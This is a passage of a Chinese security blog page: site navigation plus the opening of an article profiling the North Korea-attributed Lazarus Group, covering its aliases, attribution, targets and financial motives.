79.5-33.6 140.5-16.8 114 51.4-3.7 9.4 1.1 10.9 8.3 13.1 135.7 42.3 34.8 215.2-169.7 215.2zm143.7-146.3c-5.4-55.7-78.5-94-163.4-85.7-84.8 8.6-148.8 60.3-143.4 116s78.5 94 163.4 85.7c84.8-8.6 148.8-60.3 143.4-116zM347.9 35.1c-25.9 5.6-16.8 43.7 8.3 38.3 72.3-15.2 134.8 52.8 111.7 124-7.4 24.2 29.1 37 37.4 12 31.9-99.8-55.1-195.9-157.4-174.3zm-78.5 311c-17.1 38.8-66.8 60-109.1 46.3-40.8-13.1-58-53.4-40.3-89.7 17.7-35.4 63.1-55.4 103.4-45.1 42 10.8 63.1 50.2 46 88.5zm-86.3-30c-12.9-5.4-30 .3-38 12.9-8.3 12.9-4.3 28 8.6 34 13.1 6 30.8.3 39.1-12.9 8-13.1 3.7-28.3-9.7-34zm32.6-13.4c-5.1-1.7-11.4.6-14.3 5.4-2.9 5.1-1.4 10.6 3.7 12.9 5.1 2 11.7-.3 14.6-5.4 2.8-5.2 1.1-10.9-4-12.9z"/></symbol></defs></svg>
  
  <header class="site-header">
  
  <button class="icon-button js-sidebar-toggle sidebar-toggle" type="button" aria-label="打开侧边栏" aria-controls="paper-sidebar-drawer" aria-expanded="false">
    
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-menu flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-menu"></use></svg>

  </button>

  <div class="brand">
    <div class="brand-mark-wrapper">
      
        <a class="brand-mark" href="/" aria-label="FlatPaper 首页">
          
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-layout-grid flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-layout-grid"></use></svg>

        </a>
      
    </div>
    <a class="brand-text" href="/">ZapcoMan&#39;s world</a>
  </div>

  <nav class="site-nav" aria-label="主导航">
    
      
        <a class="site-nav-link " href="/">
          
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-house flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-house"></use></svg>

          <span>首页</span>
        </a>
      
    
      
        <div class="site-nav-item has-children">
          <button class="site-nav-link site-nav-parent" type="button" aria-haspopup="true" aria-expanded="false">
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-folder flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-folder"></use></svg>

            <span>文章</span>
          </button>
          <div class="site-nav-menu" role="menu">
            
              <a role="menuitem" class="" href="/categories/">
                
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-folder flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-folder"></use></svg>

                <span>分类</span>
              </a>
            
              <a role="menuitem" class="" href="/tags/">
                
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-tag flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-tag"></use></svg>

                <span>标签</span>
              </a>
            
              <a role="menuitem" class="" href="/archives/">
                
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-archive flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-archive"></use></svg>

                <span>归档</span>
              </a>
            
          </div>
        </div>
      
    
      
        <a class="site-nav-link " href="/links/">
          
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-link flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-link"></use></svg>

          <span>友链</span>
        </a>
      
    
      
        <a class="site-nav-link " href="/about/">
          
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-user flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-user"></use></svg>

          <span>关于</span>
        </a>
      
    
  </nav>

  <div class="header-tools">
    <button class="icon-button js-search-open" type="button" aria-label="搜索文章">
      
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-search flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-search"></use></svg>

    </button>
    <div class="accent-picker">
      <button class="icon-button accent-toggle" type="button" aria-label="选择主题色" title="选择主题色" aria-haspopup="true" aria-expanded="false" aria-controls="accent-menu">
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-palette flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-palette"></use></svg>

      </button>
      <div class="accent-menu" id="accent-menu" role="menu" aria-label="主题色">
        <button type="button" class="accent-option" role="menuitemradio" aria-label="橙色" aria-checked="false" data-accent-option="orange">
          <span class="accent-swatch accent-swatch--orange" aria-hidden="true"></span>
        </button>
        <button type="button" class="accent-option" role="menuitemradio" aria-label="紫色" aria-checked="false" data-accent-option="purple">
          <span class="accent-swatch accent-swatch--purple" aria-hidden="true"></span>
        </button>
        <button type="button" class="accent-option" role="menuitemradio" aria-label="樱花粉" aria-checked="false" data-accent-option="sakura">
          <span class="accent-swatch accent-swatch--sakura" aria-hidden="true"></span>
        </button>
        <button type="button" class="accent-option" role="menuitemradio" aria-label="蓝色" aria-checked="false" data-accent-option="blue">
          <span class="accent-swatch accent-swatch--blue" aria-hidden="true"></span>
        </button>
        <button type="button" class="accent-option" role="menuitemradio" aria-label="粉色" aria-checked="false" data-accent-option="pink">
          <span class="accent-swatch accent-swatch--pink" aria-hidden="true"></span>
        </button>
        <button type="button" class="accent-option" role="menuitemradio" aria-label="绿色" aria-checked="false" data-accent-option="green">
          <span class="accent-swatch accent-swatch--green" aria-hidden="true"></span>
        </button>
        <button type="button" class="accent-option" role="menuitemradio" aria-label="黑色" aria-checked="false" data-accent-option="black">
          <span class="accent-swatch accent-swatch--black" aria-hidden="true"></span>
        </button>
      </div>
    </div>
    <button class="theme-toggle" type="button" aria-label="切换颜色模式">
      <span class="theme-icon theme-icon--sun">
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-sun flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-sun"></use></svg>
</span>
      <span class="theme-icon theme-icon--moon">
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-moon flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-moon"></use></svg>
</span>
    </button>
  </div>
</header>


  
  <main class="paper-shell paper-shell--article">
    

<aside id="paper-sidebar-drawer" class="paper-sidebar paper-sidebar--right" aria-label="侧边栏">
  <div class="drawer-toolbar" aria-label="侧边栏工具">
    <div class="drawer-accent-options" role="group" aria-label="主题色">
      <button type="button" class="accent-option" aria-label="橙色" aria-pressed="false" data-accent-option="orange">
        <span class="accent-swatch accent-swatch--orange" aria-hidden="true"></span>
      </button>
      <button type="button" class="accent-option" aria-label="紫色" aria-pressed="false" data-accent-option="purple">
        <span class="accent-swatch accent-swatch--purple" aria-hidden="true"></span>
      </button>
      <button type="button" class="accent-option" aria-label="樱花粉" aria-pressed="false" data-accent-option="sakura">
        <span class="accent-swatch accent-swatch--sakura" aria-hidden="true"></span>
      </button>
      <button type="button" class="accent-option" aria-label="蓝色" aria-pressed="false" data-accent-option="blue">
        <span class="accent-swatch accent-swatch--blue" aria-hidden="true"></span>
      </button>
      <button type="button" class="accent-option" aria-label="粉色" aria-pressed="false" data-accent-option="pink">
        <span class="accent-swatch accent-swatch--pink" aria-hidden="true"></span>
      </button>
      <button type="button" class="accent-option" aria-label="绿色" aria-pressed="false" data-accent-option="green">
        <span class="accent-swatch accent-swatch--green" aria-hidden="true"></span>
      </button>
      <button type="button" class="accent-option" aria-label="黑色" aria-pressed="false" data-accent-option="black">
        <span class="accent-swatch accent-swatch--black" aria-hidden="true"></span>
      </button>
    </div>
    <button class="icon-button drawer-close js-sidebar-close" type="button" aria-label="关闭侧边栏">
      
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-x flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-x"></use></svg>

    </button>
  </div>

  <section class="side-card nav-card">
    <nav class="site-nav-drawer" aria-label="移动端导航">
      
        
          <a class="" href="/">
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-house flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-house"></use></svg>

            <span>首页</span>
          </a>
        
      
        
          <div class="drawer-nav-group">
            <button class="drawer-nav-parent" type="button" aria-expanded="false">
              
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-folder flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-folder"></use></svg>

              <span>文章</span>
            </button>
            <div class="drawer-nav-children">
              
                <a class="" href="/categories/">
                  
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-folder flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-folder"></use></svg>

                  <span>分类</span>
                </a>
              
                <a class="" href="/tags/">
                  
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-tag flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-tag"></use></svg>

                  <span>标签</span>
                </a>
              
                <a class="" href="/archives/">
                  
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-archive flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-archive"></use></svg>

                  <span>归档</span>
                </a>
              
            </div>
          </div>
        
      
        
          <a class="" href="/links/">
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-link flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-link"></use></svg>

            <span>友链</span>
          </a>
        
      
        
          <a class="" href="/about/">
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-user flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-user"></use></svg>

            <span>关于</span>
          </a>
        
      
    </nav>
  </section>

  <section class="side-card profile-card">
    
      <div class="avatar avatar--image avatar--circle">
        <img src="https://avatars.githubusercontent.com/u/66863012?s=400&amp;u=12653af0def352c0458bfcf15b96cfa21fcaf518&amp;v=4" alt="ZapcoMan" loading="lazy" referrerpolicy="no-referrer">
      </div>
    
    <h3>ZapcoMan</h3>
    <p class="profile-role">日常记录</p>
    <p>独立开发者 主攻方向：Java 后端开发（Spring Boot + Vue3 全栈）Python 脚本开发（网络编程、爬虫、数据处理、信息安全工具、自动化运维,渗透测试工具）</p>
    
      <div class="site-info" aria-label="站点信息">
        
          
            <a class="site-info__item" href="/archives/">
              <strong>134</strong>
              <span>文章</span>
            </a>
          
        
          
            <a class="site-info__item" href="/categories/">
              <strong>31</strong>
              <span>分类</span>
            </a>
          
        
          
            <a class="site-info__item" href="/tags/">
              <strong>235</strong>
              <span>标签</span>
            </a>
          
        
      </div>
    
    <div class="socials">
      
        <a href="https://github.com/ZapcoMan" target="_blank" rel="noopener" aria-label="GitHub" data-tooltip="GitHub">
          
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="currentColor" class="lucide lucide-github flatpaper-icon flatpaper-icon--fa-brands" aria-hidden="true"><use href="#flatpaper-icon-fa-brands-github"></use></svg>

          
        </a>
      
        <a href="https://space.bilibili.com/544166891" target="_blank" rel="noopener" aria-label="Bilibili" data-tooltip="Bilibili">
          
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="currentColor" class="lucide lucide-bilibili flatpaper-icon flatpaper-icon--fa-brands" aria-hidden="true"><use href="#flatpaper-icon-fa-brands-bilibili"></use></svg>

          
        </a>
      
        <a href="#" target="_blank" rel="noopener" aria-label="掘金" data-tooltip="掘金">
          
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-send flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-send"></use></svg>

          
        </a>
      
      
        
        
        <a href="/atom.xml" aria-label="RSS feed" data-tooltip="RSS feed">
          
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-rss flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-rss"></use></svg>

        </a>
      
    </div>
  </section>

  

  
    <div class="post-sticky-stack">
      <section class="side-card toc-card">
        <header class="toc-card__head">
          <h2>
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-table-of-contents flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-table-of-contents"></use></svg>
文章目录</h2>
          <button type="button" class="toc-toggle-all" data-action="toggle-toc" aria-pressed="false" aria-label="展开全部目录" title="展开全部目录">
            
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-down flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-chevron-down"></use></svg>

          </button>
        </header>
        <div class="toc-content">
          
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%95%E8%A8%80%EF%BC%9A%E6%9C%80%E4%B8%8D%E5%83%8F%E9%97%B4%E8%B0%8D%E7%9A%84%E2%80%9D%E5%9B%BD%E5%AE%B6%E7%BA%A7%E9%BB%91%E5%AE%A2%E2%80%9D"><span class="toc-text">引言：最不像间谍的”国家级黑客”</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E7%BB%84%E7%BB%87%E6%A6%82%E5%86%B5"><span class="toc-text">一、组织概况</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89%E4%B8%AA%E5%AD%90%E7%BB%84%E7%BB%87%E7%9A%84%E5%88%86%E5%B7%A5"><span class="toc-text">三个子组织的分工</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E5%8D%81%E4%B8%83%E5%B9%B4%E6%94%BB%E5%87%BB%E6%97%B6%E9%97%B4%E7%BA%BF"><span class="toc-text">二、十七年攻击时间线</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%A0%87%E5%BF%97%E6%80%A7%E4%BA%8B%E4%BB%B6%E6%B7%B1%E5%BA%A6%E6%8B%86%E8%A7%A3"><span class="toc-text">三、标志性事件深度拆解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#3-1-%E7%B4%A2%E5%B0%BC%E5%BD%B1%E4%B8%9A%EF%BC%882014%EF%BC%89%E2%80%94%E2%80%94%E2%80%9C%E5%A4%8D%E4%BB%87%E2%80%9D%E4%B8%8E%E2%80%9D%E9%9C%87%E6%85%91%E2%80%9D"><span class="toc-text">3.1 索尼影业（2014）——“复仇”与”震慑”</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-2-%E5%AD%9F%E5%8A%A0%E6%8B%89%E5%9B%BD%E5%A4%AE%E8%A1%8C%E5%A4%A7%E5%8A%AB%E6%A1%88%EF%BC%882016%EF%BC%89%E2%80%94%E2%80%94%E9%93%B6%E8%A1%8C%E7%B3%BB%E7%BB%9F%E7%9A%84%E2%80%9D%E5%AE%8C%E7%BE%8E%E7%8A%AF%E7%BD%AA%E2%80%9D"><span class="toc-text">3.2 孟加拉国央行大劫案（2016）——银行系统的”完美犯罪”</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-3-WannaCry%EF%BC%882017%EF%BC%89%E2%80%94%E2%80%94%E4%B8%80%E6%AC%A1%E5%A4%B1%E6%8E%A7%E7%9A%84%E5%8B%92%E7%B4%A2%E8%A0%95%E8%99%AB"><span class="toc-text">3.3 WannaCry（2017）——一次失控的勒索蠕虫</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-4-%E5%8A%A0%E5%AF%86%E8%B4%A7%E5%B8%81%E5%A4%A7%E7%9B%97%E7%AA%83%E6%97%B6%E4%BB%A3%EF%BC%882018-%E8%87%B3%E4%BB%8A%EF%BC%89%E2%80%94%E2%80%94%E4%B8%BA%E5%A4%96%E6%B1%87%E8%80%8C%E7%94%9F%E7%9A%84%E6%96%B0%E6%88%98%E5%9C%BA"><span class="toc-text">3.4 加密货币大盗窃时代（2018 至今）——为外汇而生的新战场</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-5-%E4%BB%A3%E7%A0%81%E7%BA%A7%E6%94%BB%E5%87%BB%E9%93%BE%EF%BC%9AEternalBlue-%E4%BB%8E%E6%BC%8F%E6%B4%9E%E5%88%B0%E5%8B%92%E7%B4%A2%E7%9A%84%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84"><span class="toc-text">3.5 代码级攻击链：EternalBlue 从漏洞到勒索的完整路径</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E6%8A%80%E6%9C%AF%E6%AD%A6%E5%99%A8%E5%BA%93%E4%B8%8E%E6%94%BB%E5%87%BB%E6%89%8B%E6%B3%95"><span class="toc-text">四、技术武器库与攻击手法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#4-1-%E6%A0%87%E5%BF%97%E6%80%A7%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6"><span class="toc-text">4.1 标志性恶意软件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-2-%E6%8B%9B%E7%89%8C%E6%94%BB%E5%87%BB%E6%89%8B%E6%B3%95"><span class="toc-text">4.2 招牌攻击手法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-3-%E6%B7%B1%E5%BA%A6%E6%8B%86%E8%A7%A3%EF%BC%9AAppleJeus-%E7%9A%84%E2%80%9D%E5%A4%9A%E5%B9%B3%E5%8F%B0%E6%9C%A8%E9%A9%AC%E2%80%9D%E8%BF%9B%E5%8C%96"><span class="toc-text">4.3 深度拆解：AppleJeus 的”多平台木马”进化</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-4-%E6%A3%80%E6%B5%8B%E4%B8%8E%E9%98%B2%E5%BE%A1%EF%BC%9A%E5%A6%82%E4%BD%95%E5%8F%91%E7%8E%B0-Lazarus-%E7%9A%84%E7%97%95%E8%BF%B9%EF%BC%9F"><span class="toc-text">4.4 检测与防御：如何发现 Lazarus 的痕迹？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-5-Lazarus-%E5%85%B8%E5%9E%8B-IOC%EF%BC%88%E5%A4%B1%E9%99%B7%E6%8C%87%E6%A0%87%EF%BC%89%E6%B8%85%E5%8D%95"><span class="toc-text">4.5 Lazarus 典型 IOC（失陷指标）清单</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81%E8%B5%84%E9%87%91%E9%93%BE%E8%B7%AF%EF%BC%9A%E6%8A%A2%E6%9D%A5%E7%9A%84%E9%92%B1%E5%8E%BB%E4%BA%86%E5%93%AA%EF%BC%9F"><span class="toc-text">五、资金链路：抢来的钱去了哪？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD%E3%80%81%E5%BD%92%E5%9B%A0%E4%B8%8E%E4%BA%89%E8%AE%AE"><span class="toc-text">六、归因与争议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%83%E3%80%81%E5%AF%B9%E8%A1%8C%E4%B8%9A%E4%B8%8E%E4%B8%AA%E4%BA%BA%E7%9A%84%E5%90%AF%E7%A4%BA"><span class="toc-text">七、对行业与个人的启示</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%B9%E6%9C%BA%E6%9E%84%E7%9A%84%E5%90%AF%E7%A4%BA"><span class="toc-text">对机构的启示</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%B9%E4%B8%AA%E4%BA%BA%E7%9A%84%E5%90%AF%E7%A4%BA"><span class="toc-text">对个人的启示</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-5-%E6%A3%80%E6%B5%8B%E5%BB%BA%E8%AE%AE%EF%BC%9A%E4%B8%8E%E6%9C%AC%E7%AB%99%E6%8A%80%E6%9C%AF%E7%B3%BB%E5%88%97%E7%9A%84%E8%81%94%E5%8A%A8"><span class="toc-text">7.5 检测建议：与本站技术系列的联动</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AB%E3%80%81%E7%BB%93%E8%AF%AD%EF%BC%9A%E4%B8%80%E6%94%AF%E4%B8%BA%E9%92%B1%E8%80%8C%E7%94%9F%E7%9A%84%E7%BD%91%E7%BB%9C%E5%86%9B%E9%98%9F"><span class="toc-text">八、结语：一支为钱而生的网络军队</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-text">参考资料</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E6%96%87%E7%AB%A0"><span class="toc-text">相关文章</span></a></li></ol>
          
        </div>
      </section>
      

  <section class="side-card recent-card latest-posts-card">
    <h2>
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-history flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-history"></use></svg>
最新文章</h2>
    <ul class="recent-list">
      
        <li>
          <a class="recent-item" href="/2026/08/24/20260824/2026082409/">
            <strong>看门狗游戏里的无人车，现实里的&#34;近源渗透车&#34;：无人机与遥控车的近源攻击可行性研究——从 ctOS 到 Wi-Fi Pineapple</strong>
            <em>2026-08-24</em>
          </a>
        </li>
      
        <li>
          <a class="recent-item" href="/2026/08/24/20260824/2026082408/">
            <strong>你的车里藏着&#34;眼睛&#34;：电磁反侦察——用 SDR 揪出身边的 GPS 定位器、窃听器与偷拍镜头</strong>
            <em>2026-08-24</em>
          </a>
        </li>
      
        <li>
          <a class="recent-item" href="/2026/08/24/20260824/2026082407/">
            <strong>被一句谎话拐走的天空之眼：无人机射频安全——从 SkyJack 到图传裸奔</strong>
            <em>2026-08-24</em>
          </a>
        </li>
      
        <li>
          <a class="recent-item" href="/2026/08/24/20260824/2026082406/">
            <strong>你手机里的&#34;真北&#34;是谁说的：GPS 欺骗与导航战——从 RQ-170 到黑海的&#34;位置谎言&#34;</strong>
            <em>2026-08-24</em>
          </a>
        </li>
      
        <li>
          <a class="recent-item" href="/2026/08/24/20260824/2026082405/">
            <strong>你刷的每一张卡，都是一段射频故事：RFID/NFC 门禁卡安全——从 125kHz 到 13.56MHz 的攻防终局</strong>
            <em>2026-08-24</em>
          </a>
        </li>
      
    </ul>
  </section>


    </div>
  

  

</aside>

    <section class="paper-main">
      

<div class="article-tape-wrap">
<span class="tape tape--top-right" aria-hidden="true"></span>
<article class="article-paper">
  
  <header class="article-header">
    
      <a class="label-pill" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-folder flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-folder"></use></svg>

        网络安全
      </a>
    
    <h1>黑客组织 - Lazarus：朝鲜&#34;隐藏眼镜蛇&#34;的全球金融掠夺史</h1>
    <div class="meta-line meta-line--article">
      <span class="meta-date">
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-calendar flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-calendar"></use></svg>
2026-08-19</span>
      
        <span class="meta-tags">
          
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-tag flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-tag"></use></svg>

          <a class="meta-tag-link" href="/tags/%E7%A4%BE%E4%BC%9A%E5%B7%A5%E7%A8%8B%E5%AD%A6/">#社会工程学</a><a class="meta-tag-link" href="/tags/%E9%BB%91%E5%AE%A2%E7%BB%84%E7%BB%87/">#黑客组织</a><a class="meta-tag-link" href="/tags/APT%E5%88%86%E6%9E%90/">#APT分析</a>
        </span>
      
    </div>
  </header>

  


  <div class="article-content">
    <blockquote>
<p>从索尼影业到孟加拉央行，从 WannaCry 到加密货币交易所——一个由国家力量驱动、以”抢钱”为唯一使命的黑客组织的十七年。<br>它不是为情报而生，而是为外汇而生。</p>
</blockquote>
<hr>
<h2 id="引言：最不像间谍的”国家级黑客”"><a href="#引言：最不像间谍的”国家级黑客”" class="headerlink" title="引言：最不像间谍的”国家级黑客”"></a>引言：最不像间谍的”国家级黑客”</h2><p>大多数 APT 组织的任务是<strong>偷情报</strong>——俄罗斯”双熊”盯外交与选举，伊朗的 Charming Kitten 盯核计划与异见者。但有一个组织例外，它的 KPI 不是情报，而是<strong>美元、比特币和外汇</strong>。</p>
<p>它就是 <strong>Lazarus Group</strong>（拉撒路集团），安全圈代号”<strong>隐藏眼镜蛇</strong>（Hidden Cobra）”，归属指向<strong>朝鲜民主主义人民共和国</strong>。</p>
<p>从 2009 年至今，Lazarus 被归因的攻击累计<strong>窃取或勒索超过 30 亿美元</strong>，涉及索尼影业、孟加拉国央行、全球数千家银行、以及数不清的加密货币交易所。它是极少数<strong>公开承认被国家级力量驱动、以纯粹经济回报为目标</strong>的 APT 组织。</p>
<p>一句话定义它：</p>
<blockquote>
<p><strong>Lazarus &#x3D; 一支由国家情报机关训练、为打破经济制裁而”抢钱”的网络军队。</strong></p>
</blockquote>
<hr>
<h2 id="一、组织概况"><a href="#一、组织概况" class="headerlink" title="一、组织概况"></a>一、组织概况</h2><table>
<thead>
<tr>
<th>属性</th>
<th>信息</th>
</tr>
</thead>
<tbody><tr>
<td><strong>代号</strong></td>
<td>Lazarus Group（拉撒路集团）</td>
</tr>
<tr>
<td><strong>别名</strong></td>
<td>Hidden Cobra（隐藏眼镜蛇，美方命名）、Guardians of Peace（和平守护者，索尼事件用名）、Appleworm、ZINC、Diamond Sleet、Labyrinth Chollima、Andariel、Bluenoroff</td>
</tr>
<tr>
<td><strong>首次活动</strong></td>
<td>约 2009 年（部分报告追溯至 2007 年”第一作战”）</td>
</tr>
<tr>
<td><strong>归属机构</strong></td>
<td>朝鲜<strong>侦察总局（RGB）</strong> 下属的第 110 研究中心 &#x2F; 网络战部门</td>
</tr>
<tr>
<td><strong>主要目标</strong></td>
<td>全球金融机构、加密货币交易所、政府、媒体、国防承包商、关键基础设施</td>
</tr>
<tr>
